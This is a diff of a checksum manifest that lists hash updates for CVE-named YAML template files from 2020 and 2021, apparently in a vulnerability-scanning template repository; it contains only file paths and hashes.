+http/cves/2020/CVE-2020-22211.yaml:f879a2c4d79aa01c1792e457a0d9b44a9888c361 http/cves/2020/CVE-2020-22840.yaml:6c6cad1388bb2ab7192fec9a483e3a8f3edb4547 -http/cves/2020/CVE-2020-23015.yaml:b3346c6e48dedf09b34f6536a4587e45ca64bce6 -http/cves/2020/CVE-2020-23517.yaml:73756be29508961bb810d8e834dbc72405a9b795 -http/cves/2020/CVE-2020-23575.yaml:34feab963e6f827c990da7425411850158b98da7 -http/cves/2020/CVE-2020-23697.yaml:66c34a7b7282b992e375c0744730d026682142fa +http/cves/2020/CVE-2020-23015.yaml:ef79be791a7a626c839061dcf881161a0234c38e +http/cves/2020/CVE-2020-23517.yaml:7f6751c9864765646315890d0899439d10142df9 +http/cves/2020/CVE-2020-23575.yaml:67ab082068717a9921ae80d3394859c74d1398ac +http/cves/2020/CVE-2020-23697.yaml:ad5a719d4e93a26db478bd8c3f4245db3515b06e http/cves/2020/CVE-2020-23972.yaml:c1383a5e782d88347b1ace6499e3c8e148aad5c4 -http/cves/2020/CVE-2020-24148.yaml:68cd11ce743eac9ed781b865de8a9d6f066af84e -http/cves/2020/CVE-2020-24186.yaml:6d6d875a225e3d8483cedea3d18be5d10eed6668 +http/cves/2020/CVE-2020-24148.yaml:828c203ffd58618490347102066f2f539d9116af +http/cves/2020/CVE-2020-24186.yaml:25250262fde4e0a9d147c93c2f88bd9cbb775129 http/cves/2020/CVE-2020-24223.yaml:3dcce16e9d8be524d4f16ebc04564135e16a5df3 -http/cves/2020/CVE-2020-24312.yaml:64454cabae9f19c9ff900daf8206d16dcfd97091 -http/cves/2020/CVE-2020-24391.yaml:3cd35fe6417b0647ce50bbc4a16996c8c8981fb2 +http/cves/2020/CVE-2020-24312.yaml:c504548af3d920be3be02e59c790bd7690154549 +http/cves/2020/CVE-2020-24391.yaml:317ba4c2e9e25a10d25a10a73e36e95752099d9d http/cves/2020/CVE-2020-24550.yaml:df5052c65b1037f38f8ed25cb384ec4c54f81b8c http/cves/2020/CVE-2020-24571.yaml:5c31b80a9c7ae3e327ea91a5112b930676527155 -http/cves/2020/CVE-2020-24579.yaml:bd9a169a4c1af3ff65b5466200ab4d7989af7a04 -http/cves/2020/CVE-2020-24589.yaml:d26d02bb554d34740163c2cb502b03bd0bb108c0 -http/cves/2020/CVE-2020-24701.yaml:e39f30359517b3d238c0f047b7ded94881e69a14 -http/cves/2020/CVE-2020-24902.yaml:1259b4854191d05b01caa8d1b7f1e845b6cd04cf -http/cves/2020/CVE-2020-24903.yaml:89bf3a81d901c9d7364475f05800d40065327228 -http/cves/2020/CVE-2020-24912.yaml:a5df47738a105f4c07e66c50d21622c2fb4d8ed9 +http/cves/2020/CVE-2020-24579.yaml:62759de772a6d5027e0dcdd5964ce4cc03194022 +http/cves/2020/CVE-2020-24589.yaml:9fdcb854777f1f0f4db18d334f9c769384a71d5c +http/cves/2020/CVE-2020-24701.yaml:6782e29645189f99e7d44df42c067f0e0be0de46 +http/cves/2020/CVE-2020-24902.yaml:fb8e001d6a2081b3a0328a714577005efea05db6 +http/cves/2020/CVE-2020-24903.yaml:51a953c902a4c738e3a11a376fab3fd9baddbf16 +http/cves/2020/CVE-2020-24912.yaml:9a5855c216f6eb711710ff74138e2d615ebe5cfd http/cves/2020/CVE-2020-24949.yaml:75e53db8ae949b1e8991bcf5b51fc2afd196c6bc http/cves/2020/CVE-2020-25078.yaml:d2e80d7483241efcdeaeec253eee58e18089501b -http/cves/2020/CVE-2020-25213.yaml:cc2572578c2f5bf8269c6b208b3939987c2d18ef -http/cves/2020/CVE-2020-25223.yaml:b2c1068143116b03e67b909cb00887d396c28d92 +http/cves/2020/CVE-2020-25213.yaml:2b4d15844a75b3c8b331efd61791d2a8cb3cf8e0 +http/cves/2020/CVE-2020-25223.yaml:a3693fe0f645932d320d2ab0ff173c31744f0850 http/cves/2020/CVE-2020-25495.yaml:046e0a535a8b9fd74f70e1ff2d90dbef6e20c658 -http/cves/2020/CVE-2020-25506.yaml:27620edd7c191f6c5f918ec2546c7de54e9124cb -http/cves/2020/CVE-2020-2551.yaml:2b7bf0bb7f84d06e15d8d41c964ad58491c0126f -http/cves/2020/CVE-2020-25540.yaml:b1b69542b3b044d72ae7f85052d20bd2922056eb +http/cves/2020/CVE-2020-25506.yaml:883657db91c0d3f56d9828180b950d477af18999 +http/cves/2020/CVE-2020-2551.yaml:e7b2ae758383e6f1d3f2de83a8b4d9c0fdb9aa73 +http/cves/2020/CVE-2020-25540.yaml:b982bfa81fcb18ff4ae12e6075875a032eac51a9 http/cves/2020/CVE-2020-25780.yaml:3983db60c1ca28a8c7999041013ab96f5c896a9f -http/cves/2020/CVE-2020-25864.yaml:7ba0c416fbc580ffa8eb8f8fc337a77cd4a76b6c +http/cves/2020/CVE-2020-25864.yaml:574a13cfef80f75cb0712172cc55e41cdbd495f1 http/cves/2020/CVE-2020-26073.yaml:793eb5c47388abfea3111d98fc083ef549f2f51f http/cves/2020/CVE-2020-26153.yaml:455c58760238ddd079e51172072ef963e95e58ec -http/cves/2020/CVE-2020-26214.yaml:e15fb53018e98df0c349367eab19c2ae3d851d77 -http/cves/2020/CVE-2020-26217.yaml:8d3e7b139f7edff0496b2776f409f072bf153d55 +http/cves/2020/CVE-2020-26214.yaml:c9550b0a95085975804bf0adf411947d89925d2e +http/cves/2020/CVE-2020-26217.yaml:22e1a3fe2541425175198c852f37d342fbb87a0a http/cves/2020/CVE-2020-26248.yaml:7c31fd4f253b81b3afe18098ea3b7db896f1efd7 http/cves/2020/CVE-2020-26258.yaml:da846b0baeb41eb83b4c8ac05986b1eb0be6a1af -http/cves/2020/CVE-2020-26413.yaml:c6ae98d72b9daec71461b2c86159c469efa8fb32 +http/cves/2020/CVE-2020-26413.yaml:d73538b5a598487cf0268b6b031b25613718f92f http/cves/2020/CVE-2020-26876.yaml:cddbbb81ba783c1c427b257e9caae9d9c0fa976a http/cves/2020/CVE-2020-26919.yaml:1f958ae88864447bcb937900bf0a813a033204b5 -http/cves/2020/CVE-2020-26948.yaml:cdadfb9ba6724ecfdd94740c729a0e0c443a3036 +http/cves/2020/CVE-2020-26948.yaml:513d547c9b9f5ef43299cb380687dd64caaced81 http/cves/2020/CVE-2020-27191.yaml:4de1b9dd94d0973bfb7b1e6315d254603c5f1765 -http/cves/2020/CVE-2020-2733.yaml:a448094a7e74f2e3b6604186adbca425e3cec908 +http/cves/2020/CVE-2020-2733.yaml:e85d06ccdfb80f6d6628798106813cb79aae0c9d http/cves/2020/CVE-2020-27361.yaml:05e120b7de223a91a94eeee3b3849a2a3154f371 -http/cves/2020/CVE-2020-27467.yaml:e190b3c2d91f742f916a82030de9b4d8221b4e9b -http/cves/2020/CVE-2020-27481.yaml:1c6c8f8e84d22f9aa0ea5d634a3adff940839765 +http/cves/2020/CVE-2020-27467.yaml:9a74107153a3d881f4de65787037fea872e05808 +http/cves/2020/CVE-2020-27481.yaml:4b32a25c1171a8bbe3a79021d69aa408eb6b4d5c http/cves/2020/CVE-2020-27735.yaml:c11acea90495bacb3b3e5cd069b49cbc543621e7 -http/cves/2020/CVE-2020-27838.yaml:f5d793dca6b37d410967a3a4c355b9aec9093594 -http/cves/2020/CVE-2020-27866.yaml:48b6550611c83a6d35f2437e66a0031e51f1930a -http/cves/2020/CVE-2020-27982.yaml:a1e9d4dd0d75d6209feb856df302363ff551e7d4 -http/cves/2020/CVE-2020-27986.yaml:c2668ca4f159f3302764e6c01bfb8b0303aed21b -http/cves/2020/CVE-2020-28185.yaml:2dca6d757d0230f6e3c009fd75d047a5c2d41c07 -http/cves/2020/CVE-2020-28188.yaml:9328f627c742f2eba1355c3f32f933281654dfb4 -http/cves/2020/CVE-2020-28208.yaml:17f8f9f3851d089ed3ba72296ebb1901169322b4 +http/cves/2020/CVE-2020-27838.yaml:c92bb76888150f83b0a4abc33eead1b830d151e6 +http/cves/2020/CVE-2020-27866.yaml:94e95838349bf47e7bf695cdad78c991d81b11f2 +http/cves/2020/CVE-2020-27982.yaml:c67891c33b8929528dcc5a271dc50dcf68efaf65 +http/cves/2020/CVE-2020-27986.yaml:893336c14059a046c22f8cd517e66893d0139361 +http/cves/2020/CVE-2020-28185.yaml:ecfb9fcc4bbfe0937f6b99302979dec7dabc55f3 +http/cves/2020/CVE-2020-28188.yaml:c0980bcbb94378ff28df21229115235308770f13 +http/cves/2020/CVE-2020-28208.yaml:fcf8162a856d78d120573693438b0646df11a72c http/cves/2020/CVE-2020-28351.yaml:16f3808bf7037eee165ff817b9032b07cff97715 -http/cves/2020/CVE-2020-28871.yaml:67720a0089ca532649039c13100df95c7a7bc194 +http/cves/2020/CVE-2020-28871.yaml:a26b9eec2511c2ca500ebccbad87e19d81fd69e6 http/cves/2020/CVE-2020-28976.yaml:598019c32cb4b0e55d77f7c45f1ba39593debba3 -http/cves/2020/CVE-2020-29164.yaml:a7821d97ab89dafa618381c5df70b60fd8657b44 -http/cves/2020/CVE-2020-29227.yaml:122475843b9e415cf59e2ed0b4dc9b2ac9c00cb4 -http/cves/2020/CVE-2020-29284.yaml:20abe2012386881cc230cd068b1fe4084fc25f5b -http/cves/2020/CVE-2020-29395.yaml:b0aa043c5646021dc76bb08b9b1e1ba1f8a569bc +http/cves/2020/CVE-2020-29164.yaml:b22ac231890e04ebe3bd4842f48b8b75dfa68807 +http/cves/2020/CVE-2020-29227.yaml:014575ac4dec53a13f8dd825cff7a84066f0ae9c +http/cves/2020/CVE-2020-29284.yaml:80a4ee991c7571f79905e18861b3dd84a62689b5 +http/cves/2020/CVE-2020-29395.yaml:16cb6925395ccc7b50f83f03eaca8e71deaa0675 http/cves/2020/CVE-2020-29453.yaml:36f8bba4fdee54e96e54f2132471c8bddf38fdb9 -http/cves/2020/CVE-2020-29583.yaml:1eb6c3ab90222daf4aa8b2b2599b0d11e7db9086 +http/cves/2020/CVE-2020-29583.yaml:0086f54be23a01d66cf70629291399c856783530 http/cves/2020/CVE-2020-29597.yaml:0784e4768d628b088948e4409de7690b6b28dc4c http/cves/2020/CVE-2020-3187.yaml:633d566201388dc1399f783b58cfc07f94d4aa51 -http/cves/2020/CVE-2020-3452.yaml:462a13a55603fea601a5eb04361ebb262a5ae885 -http/cves/2020/CVE-2020-35234.yaml:e4bb78015e568be11dc80c12b7f7c6482b2ba820 -http/cves/2020/CVE-2020-35338.yaml:41c7d218db18df546ef3f07ef88cf08fa1fa7d5c -http/cves/2020/CVE-2020-35476.yaml:26ffaf11a97ed264f91c9bf66bb10aa8a5e34c80 -http/cves/2020/CVE-2020-35489.yaml:1f8813c310acbbae92d71094491480f81093c9a1 -http/cves/2020/CVE-2020-35580.yaml:752ba7e807215ff1529be07163304e5a8ea77681 -http/cves/2020/CVE-2020-35598.yaml:fa4d75367df143b4d76d19189fb76471e81fb318 -http/cves/2020/CVE-2020-35713.yaml:04bd22c97e914a61aa173271bcc13b87474b2cd0 +http/cves/2020/CVE-2020-3452.yaml:4171936b0f65db2e31afd0b4a9157a048ec3eb91 +http/cves/2020/CVE-2020-35234.yaml:59dfdc805ed104edcb3cd667ec5f602c0e594cb9 +http/cves/2020/CVE-2020-35338.yaml:b9e1195c81bf31210947ca6f71147321930b90c1 +http/cves/2020/CVE-2020-35476.yaml:45668b616ae0a566d94ced220663dca18327b3b3 +http/cves/2020/CVE-2020-35489.yaml:950d6dbeed43968347cb9c634c5d4c3b3e0e2853 +http/cves/2020/CVE-2020-35580.yaml:5ce1a1e4040aaa35ba363d08f013c0fe525534bb +http/cves/2020/CVE-2020-35598.yaml:5e721e6213989f337663289eff70cf95418401a2 +http/cves/2020/CVE-2020-35713.yaml:2da565a85a1f7e90b28df0608bf2b6c8832c23dd http/cves/2020/CVE-2020-35729.yaml:c7598a948f72654439744155ace7dfe699bba00b -http/cves/2020/CVE-2020-35736.yaml:0595a14d942c7a19718ad31a79b197ca18066615 +http/cves/2020/CVE-2020-35736.yaml:496c42f5b621668efe592864a945cb3f45d73b8d http/cves/2020/CVE-2020-35749.yaml:8c7c7cb6375f279b172fd6db9e37182ff10b0d3d http/cves/2020/CVE-2020-35774.yaml:04828fe9dc9b3cc64c404c9f22d4f2c4746cb04f -http/cves/2020/CVE-2020-3580.yaml:5c17b9207ede49ea379376451f152493405eff3b -http/cves/2020/CVE-2020-35846.yaml:ad9de8cafbad528bd0f4f922e27014c92520ac09 -http/cves/2020/CVE-2020-35847.yaml:4636a8b6bdb0fe4822f990c002df088e792e6c63 -http/cves/2020/CVE-2020-35848.yaml:3afcd9e68aebe83507ece244d39fd96365f70338 +http/cves/2020/CVE-2020-3580.yaml:d1950f88016803a9adf2de04b9f8d0d931fa1f12 +http/cves/2020/CVE-2020-35846.yaml:6b6789e6b946872f89459f2aa77c417067cfecb1 +http/cves/2020/CVE-2020-35847.yaml:c47e2427d3c1c33454343fd46d15ce6d27b767ff +http/cves/2020/CVE-2020-35848.yaml:27044a536ef83bb5fbac8083e22dc99e4f5be3a4 http/cves/2020/CVE-2020-35951.yaml:8a82a09c399a210010151ef2b26290cb8b3c32dd -http/cves/2020/CVE-2020-35984.yaml:93e524409cf0b23db0b70db6f0094cfba52efb13 -http/cves/2020/CVE-2020-35985.yaml:ce48524c08b761ebcc575ef02765314669b5b30d -http/cves/2020/CVE-2020-35986.yaml:c76e52d22ba5e6d8fcc101ed81be8d25dce67962 -http/cves/2020/CVE-2020-35987.yaml:8d0b095e54b481e7d92d1a54504349d00471b8b1 -http/cves/2020/CVE-2020-36112.yaml:f2bf094fac8f1cdfe6a1a346cdbe6be8c7601124 -http/cves/2020/CVE-2020-36289.yaml:d297dd28860670463adcfcf6672f82e9faa1eadc -http/cves/2020/CVE-2020-36365.yaml:9a13b03b380ad3e190bfe456dd8c9e3628778dd2 +http/cves/2020/CVE-2020-35984.yaml:73026939fceebcf822ec1708bc95bf679a9222c5 +http/cves/2020/CVE-2020-35985.yaml:a9ca41b022487d171f723c4aea91fbe6013875f6 +http/cves/2020/CVE-2020-35986.yaml:1ef91cc97a2ac750b377702b293d5f9218023ff0 +http/cves/2020/CVE-2020-35987.yaml:40f2fbbdfbf459fd19272719b14853a9a059b2df +http/cves/2020/CVE-2020-36112.yaml:e52719830bf2eca68effb4397eadb8b8281338f3 +http/cves/2020/CVE-2020-36289.yaml:52f5ae4cb45c093b1f4d6e1dea3bd83cb716bb59 +http/cves/2020/CVE-2020-36365.yaml:b4678231c734f5b6508a8c3a65fc970b6e5b78b5 http/cves/2020/CVE-2020-36510.yaml:43288de50cb0daa7560d3c49ab9cb662ec943aaa -http/cves/2020/CVE-2020-4463.yaml:ba0839c3361367e1ce876c8964a18fd9822b4c18 -http/cves/2020/CVE-2020-5191.yaml:0f273b6b9bfac5701e3dda3504bd7f642d9265fb -http/cves/2020/CVE-2020-5192.yaml:b186c3cb44c730fb83ebafec8bdc72e706e559a1 -http/cves/2020/CVE-2020-5284.yaml:e0f1b069ab0fc3bc4860d6f29c8b66e56fd6c17c +http/cves/2020/CVE-2020-4463.yaml:644d422d8b7c29684081b2ba722c6c8c49dc82a2 +http/cves/2020/CVE-2020-5191.yaml:9a3a930e48da4976766fbacc6722bb8b6c262c7a +http/cves/2020/CVE-2020-5192.yaml:11f227839a3375c5d6e419bea5f60366f243ad94 +http/cves/2020/CVE-2020-5284.yaml:b6b8aea66dad94861b5d57694e171ae609077f96 http/cves/2020/CVE-2020-5307.yaml:5f2c1c7f8182d01ef6c0cab9b090f901f4e91865 http/cves/2020/CVE-2020-5405.yaml:362a063401b8e384df88fcc1f958163e9d355922 -http/cves/2020/CVE-2020-5410.yaml:ee5446048d5570981b1f589cfb8ac45765961762 +http/cves/2020/CVE-2020-5410.yaml:15ef6b720233bda3b0a3bd22593417fa44f7cbc7 http/cves/2020/CVE-2020-5412.yaml:52fe5ee1514d295e0ed4f0e29db378764c447047 http/cves/2020/CVE-2020-5775.yaml:cbcbf5ab4ce79076fa4f024290982f26ab44323c http/cves/2020/CVE-2020-5776.yaml:ddddb7cd7126aa41e107c0211722da5abebeb87f -http/cves/2020/CVE-2020-5777.yaml:fb86884641fca57dacff56448df790c077a8016b +http/cves/2020/CVE-2020-5777.yaml:414c353b95c77dcfe1220fd5926ec149093e59fa http/cves/2020/CVE-2020-5847.yaml:8a1c0ba47de6c6cd63ede6605bd99f7f7d2bc88a -http/cves/2020/CVE-2020-5902.yaml:fd6fead0ec016d1c3250bd3639df8aa3e3d7a3c6 -http/cves/2020/CVE-2020-6171.yaml:3b54178dd588febab96bc70b34ec3a9684031593 -http/cves/2020/CVE-2020-6207.yaml:88f82f2f4117df59a21bee30dabc2dbbbd55752a -http/cves/2020/CVE-2020-6287.yaml:7a1d843909ee9d794e9e8c541625d5522d360537 +http/cves/2020/CVE-2020-5902.yaml:4bcd2da425ead756fa38a85226bd3b7109824dd5 +http/cves/2020/CVE-2020-6171.yaml:7485379a4227df9a0668ace45ac89daeb1a1445c +http/cves/2020/CVE-2020-6207.yaml:dc2081d146a83be2fdd12363e69d48540509dc98 +http/cves/2020/CVE-2020-6287.yaml:5152426f4629703328b66fa272f3ca9137e59d5f http/cves/2020/CVE-2020-6308.yaml:662c78d7be59c6090f8ab983b9aecbe01757cae6 -http/cves/2020/CVE-2020-6637.yaml:028c3cea7cb4b979332c21866571714765fc3eda -http/cves/2020/CVE-2020-6950.yaml:fd7c7f30283610f8b86244eb4b0849da960e6e2e -http/cves/2020/CVE-2020-7107.yaml:1214b3094b6e6ac77539f71ee51c3585315222d8 -http/cves/2020/CVE-2020-7136.yaml:dc5c71c2c26cb8517198425acbdf352592e05265 +http/cves/2020/CVE-2020-6637.yaml:c9a81cd46d9ac5a913e1ae089e5a06c613aadbd8 +http/cves/2020/CVE-2020-6950.yaml:a2f005a3cbbbf98b511f7581f8ba88e5401510aa +http/cves/2020/CVE-2020-7107.yaml:cc6dc47b28f17c25e1619ab5a3edbb4bfed3e8f3 +http/cves/2020/CVE-2020-7136.yaml:6e732e958094e4ad30bb994e7602c0cb2e04a1ca http/cves/2020/CVE-2020-7209.yaml:0f6026d48cd89d6faa187af05d42c9518f7a48ae -http/cves/2020/CVE-2020-7318.yaml:0ee84af039d5d27f45bc0ce4a628b2550a80fd8e -http/cves/2020/CVE-2020-7796.yaml:f4b073f23fbc79d82d2d3701ea96ec2904587faa -http/cves/2020/CVE-2020-7943.yaml:7c1a1baf25d423ad09a63cd8e4c6930d58ed9626 -http/cves/2020/CVE-2020-7961.yaml:63a1bbbdf1b6a0a9e831502b6f6cadf992fc043e -http/cves/2020/CVE-2020-7980.yaml:becc3ce799e1d9d704840752e31c1b38ac0f651b -http/cves/2020/CVE-2020-8115.yaml:5783f92b5ccedceb0c259e03cca80fd47053a915 -http/cves/2020/CVE-2020-8163.yaml:f470d2d3016a962f7ec590d77b19a43f6acadb88 -http/cves/2020/CVE-2020-8191.yaml:6ed1e734ec2ee564f2b11700bc59380222121485 -http/cves/2020/CVE-2020-8193.yaml:c730b189267de57e03a336d73fda9c22c435b30e +http/cves/2020/CVE-2020-7318.yaml:4103c3864c23d3d6051a46a353c0a26f999c315d +http/cves/2020/CVE-2020-7796.yaml:2edde786f2b68cd2a253c24665496d6a985442fe +http/cves/2020/CVE-2020-7943.yaml:8afe020a36b1eb69a2b2eb06c08f9f4cd0ca5ff2 +http/cves/2020/CVE-2020-7961.yaml:f7fba861921ab2e2a62af998de3cba8f5c270cc9 +http/cves/2020/CVE-2020-7980.yaml:6d32d0a0cbe584e4adb0d9e0638aa5c4e62f3ee3 +http/cves/2020/CVE-2020-8115.yaml:a04ebc2299d633d847a169d0b9c73e883cda8f80 +http/cves/2020/CVE-2020-8163.yaml:1d8b50738e8aa4b505e6dda88b20fa7716de3ee5 +http/cves/2020/CVE-2020-8191.yaml:eb7ce1550e3c02349142058d5a0b9a713e810915 +http/cves/2020/CVE-2020-8193.yaml:4284d6d0a6afaa9469244d30d5ff29ff306d8ce6 http/cves/2020/CVE-2020-8194.yaml:1799ec8f9624c47809dedd73f5a2d22aaa20f638 http/cves/2020/CVE-2020-8209.yaml:d5a138aa97863d4074fe218b3049f7791fb81ab9 -http/cves/2020/CVE-2020-8497.yaml:cdb905b1cb4a6db55e8a6da868be8a91f09d33d6 -http/cves/2020/CVE-2020-8512.yaml:4a6489520aee40a14b3f2c70b30a28b209ee05d1 -http/cves/2020/CVE-2020-8515.yaml:60a9f0e5cf482b2abf522834d95875baf33f29ac -http/cves/2020/CVE-2020-8615.yaml:f4732edfed404f9be43debf22e295605eab2e532 -http/cves/2020/CVE-2020-8641.yaml:8d361c6ac6ea6a97bc24fbe5a8e69df0cf5ff73a -http/cves/2020/CVE-2020-8644.yaml:08ca5cfa9de25d11eff7521ad38f5279e686c141 +http/cves/2020/CVE-2020-8497.yaml:f1ae2ea882ecfe74d992711a94a9ab226dc34f2f +http/cves/2020/CVE-2020-8512.yaml:41b042b9085849f68752fdf0bbef458fb6e4c81b +http/cves/2020/CVE-2020-8515.yaml:9047b8393f7d8cc847713268690b7155b6508643 +http/cves/2020/CVE-2020-8615.yaml:28215d7bef64c613817859ffecc684925f025a6f +http/cves/2020/CVE-2020-8641.yaml:b734674ab43e3bbdc7c4396851f425c9721f8362 +http/cves/2020/CVE-2020-8644.yaml:442e833ef76b787a02a056b9de094015e0c57618 http/cves/2020/CVE-2020-8654.yaml:86969023c0fb1d0f7e502880eb4ead28b3b5cd5d http/cves/2020/CVE-2020-8771.yaml:fdbf80c1219ed77aa813cdea75224fc0e0437e11 -http/cves/2020/CVE-2020-8772.yaml:b6fec3222c262217a8cf5bba125b4298ebe5c279 -http/cves/2020/CVE-2020-8813.yaml:9eb88a961a0eacb2e81e33e6cf79ac190a2bf1f6 -http/cves/2020/CVE-2020-8982.yaml:01d3456ee84b4be1c04f9a48fdf3e521ea32ba80 -http/cves/2020/CVE-2020-9036.yaml:8f1109d1da947a0ad8562a105d79c5933d0db5cb +http/cves/2020/CVE-2020-8772.yaml:1c497ecdec6a48ebef0e1aef3571270c98b119d4 +http/cves/2020/CVE-2020-8813.yaml:a138cc708be6db87262901be29a348f42b8d0f2c +http/cves/2020/CVE-2020-8982.yaml:2609994079bdeb1e72ba61248516e1d95f6258a6 +http/cves/2020/CVE-2020-9036.yaml:c406a983523f91b2ef6adbec171216597d3e81bb http/cves/2020/CVE-2020-9043.yaml:849faa887c73b1638d4f68a403a21a320989a062 http/cves/2020/CVE-2020-9047.yaml:ef83a27c2edd3c2776b89c8bfdaec91d6e1ace59 http/cves/2020/CVE-2020-9054.yaml:c9e18ac60edbecec09d912db77f833b45b70ed7c -http/cves/2020/CVE-2020-9315.yaml:1900cca1d2d418d09656c586bc4718699fa72a12 -http/cves/2020/CVE-2020-9344.yaml:a89bced51c825a39641d826e6de466e04cedb222 -http/cves/2020/CVE-2020-9376.yaml:9136255705fdee1fea7913b09adaeb0cdfd83458 -http/cves/2020/CVE-2020-9402.yaml:398e68e2cbce9d105785e1d3cbd98056162eb439 -http/cves/2020/CVE-2020-9425.yaml:49b1c59803a7cc4378e6bfa690f375ad95855d10 +http/cves/2020/CVE-2020-9315.yaml:9c617983c07752889978bb310592e80738e185ec +http/cves/2020/CVE-2020-9344.yaml:7fdb85e16b94071d81a6cabe66028feddd357808 +http/cves/2020/CVE-2020-9376.yaml:4ecda617567ce3ec2f2afd357739dd21f516b259 +http/cves/2020/CVE-2020-9402.yaml:f03bf05b0f3b933accef4dcd7168f9129eadcfe2 +http/cves/2020/CVE-2020-9425.yaml:a917fe2704478f54404b4a5a410ea249350516d1 http/cves/2020/CVE-2020-9483.yaml:b856b57a3c83f86b77fe655826d69410a2cff66c -http/cves/2020/CVE-2020-9484.yaml:a5952e10d76346826ec105f1e756ac44c270ee63 -http/cves/2020/CVE-2020-9496.yaml:85cf814c38c7240d6138f8f2969931e1c21589cc -http/cves/2020/CVE-2020-9757.yaml:1e71acf8ed2a354d230ed4b9f2c4683ce6a6a0cb -http/cves/2021/CVE-2021-1472.yaml:9fc6a2d166c5f4420df34e0797fe64cb79ce5ecd +http/cves/2020/CVE-2020-9484.yaml:1bf9ce4062ff0408e685129bb5903a20cb049cd9 +http/cves/2020/CVE-2020-9496.yaml:5d9976de5e0d435c44785ef10bd66ae8345c2fd1 +http/cves/2020/CVE-2020-9757.yaml:7b655f574386f646becd09992d9762d3d1323c19 +http/cves/2021/CVE-2021-1472.yaml:9667efe3cd6c38e1cca9cfbf5b6bdd476230fac6 http/cves/2021/CVE-2021-1497.yaml:8e4e8691b05b2e3003f544dba1dd82e9d0469977 -http/cves/2021/CVE-2021-1498.yaml:f77f639b7bd67b05d7e4aae346e07a35bb1515bd -http/cves/2021/CVE-2021-1499.yaml:4cfb5a4971a96a3ea7449540cd2a674f8c416f3b -http/cves/2021/CVE-2021-20031.yaml:2a1693e374980b54e233b120122f40613907a67b +http/cves/2021/CVE-2021-1498.yaml:34f12d383bcd66e9c0b8abdb32af5eee246f0672 +http/cves/2021/CVE-2021-1499.yaml:0d707d87542b57952d40f7c04fb7e9f3d049eddd +http/cves/2021/CVE-2021-20031.yaml:8f171b51f07e049e29e708aba398ac1a5e9e0103 http/cves/2021/CVE-2021-20038.yaml:7167a6c38c9fde66a10e0146a4d0d470fa64c37f http/cves/2021/CVE-2021-20090.yaml:492bf1d4e71155f00ea4caff43a2ed3bd18991cf -http/cves/2021/CVE-2021-20091.yaml:1da951bf5a65bfe6f2a7704de42df7a91bd73b3c +http/cves/2021/CVE-2021-20091.yaml:19f8133469d473c2292a69989c39c54a0cf87ed7 http/cves/2021/CVE-2021-20092.yaml:cafad84bd12f41f09da4a823b1b68585a5e63051 -http/cves/2021/CVE-2021-20114.yaml:aefc50a43542667e567e801325efdfb7160044ad -http/cves/2021/CVE-2021-20123.yaml:c518f9a5a37e85cfe1c46b32ca52e73c0692747b -http/cves/2021/CVE-2021-20124.yaml:abb973e39dd6f5dce5d12dcc4ad33f22e689a4e1 -http/cves/2021/CVE-2021-20137.yaml:0daaa379a978d0428366623ff2aef851212c9f21 -http/cves/2021/CVE-2021-20150.yaml:075cd5dda8786ace5a3df71e55bdf025602c91da -http/cves/2021/CVE-2021-20158.yaml:e7060d25815d287630f615da2bc2bc16797cf003 -http/cves/2021/CVE-2021-20167.yaml:18e9d41d4ccf3a94d4037bd1b023ee8b13a38f7e -http/cves/2021/CVE-2021-20323.yaml:00fb4bd0630e78aa9c940d8eca1feae7081f925f -http/cves/2021/CVE-2021-20792.yaml:35ff7b8aad2ef0641a3118a0ac5943a40b7ce110 -http/cves/2021/CVE-2021-20837.yaml:5779476dc1adc4d80f2ebcc5c85323117c40f6a4 -http/cves/2021/CVE-2021-21087.yaml:b4a4f6e73ea548e793410fa0833fa9ddddbb2271 -http/cves/2021/CVE-2021-21234.yaml:3bebd96604bdc88a51c32a98c2b2bb9ecba0966a -http/cves/2021/CVE-2021-21287.yaml:55c45e7817d18159e21800f1e1794f26c86cdd3d -http/cves/2021/CVE-2021-21307.yaml:a058a2356df9e6607e9f8ae975812945caee9873 -http/cves/2021/CVE-2021-21311.yaml:0154798d24b10664dd98db0008b371a50f227d61 +http/cves/2021/CVE-2021-20114.yaml:36093947ca866a4627465d891f407337217f0806 +http/cves/2021/CVE-2021-20123.yaml:1827d563dfc7b91e266b8b1ddf901112f3926f78 +http/cves/2021/CVE-2021-20124.yaml:34e9e9a9175ea652c68cdf3046908f65db32b0c8 +http/cves/2021/CVE-2021-20137.yaml:ed26c4e766913416b746ce9120b823ac448731cb +http/cves/2021/CVE-2021-20150.yaml:7d165f05c8b0f913cf3a1088fc09bdbfc512503b +http/cves/2021/CVE-2021-20158.yaml:c648d25a1b384eaf49914ab6d128a647c7a8cc2f +http/cves/2021/CVE-2021-20167.yaml:36cc773bc72b6055133b65b2763ecd8bb5add28e +http/cves/2021/CVE-2021-20323.yaml:538208e51e77f582d55331ace479638d0655f3f0 +http/cves/2021/CVE-2021-20792.yaml:cd40a8ba02194765b10b24575346a4b375a4ad08 +http/cves/2021/CVE-2021-20837.yaml:85abbae82e8aa373f59622ed90dbf31a8e621de3 +http/cves/2021/CVE-2021-21087.yaml:574a986e6e401cc9348bc151d16178705b0baf8e +http/cves/2021/CVE-2021-21234.yaml:1de458d38a523fa3fa8fdb6e08aa4c53f341ce13 +http/cves/2021/CVE-2021-21287.yaml:9df66b2faeda2a1fb17e0492b028f737db95fc7c +http/cves/2021/CVE-2021-21307.yaml:17e50a4be7be781682f5a2a575ea36ecf9d751a1 +http/cves/2021/CVE-2021-21311.yaml:3c4d566dd7839f49e4166877280a90a0ae6e21f2 http/cves/2021/CVE-2021-21315.yaml:70406f1f801ca874413f322d2961c79a8754fb7f http/cves/2021/CVE-2021-21345.yaml:512607ead259d98de98ba7711800d5198a0aa819 -http/cves/2021/CVE-2021-21351.yaml:8e68e655d6102eb88dd246bfb3561d50ebf1eafd -http/cves/2021/CVE-2021-21389.yaml:a0f10bdb842da5078c37a9afacd6a602c0732546 -http/cves/2021/CVE-2021-21402.yaml:e64c2bf5425996ff22209077460cc2413d15aa9d +http/cves/2021/CVE-2021-21351.yaml:a9ff2618269205226e66ebb73a3b38b61c5c9007 +http/cves/2021/CVE-2021-21389.yaml:7a7bf10e2505418f11e6cc1759c83079f3b22e32 +http/cves/2021/CVE-2021-21402.yaml:c52caaadc4b083d16b32313b3a4582bd41fbaf98 http/cves/2021/CVE-2021-21479.yaml:6576b05e5abc8d3992d561c5217251883e27d8ca -http/cves/2021/CVE-2021-21745.yaml:da13fdae366d46db22003811aea9e87376765b7f -http/cves/2021/CVE-2021-21799.yaml:0fe83549d591a70959d82ae6cd8e487286176d5a -http/cves/2021/CVE-2021-21800.yaml:14ccc1c341b59710236dfafec5ff26f606a95d84 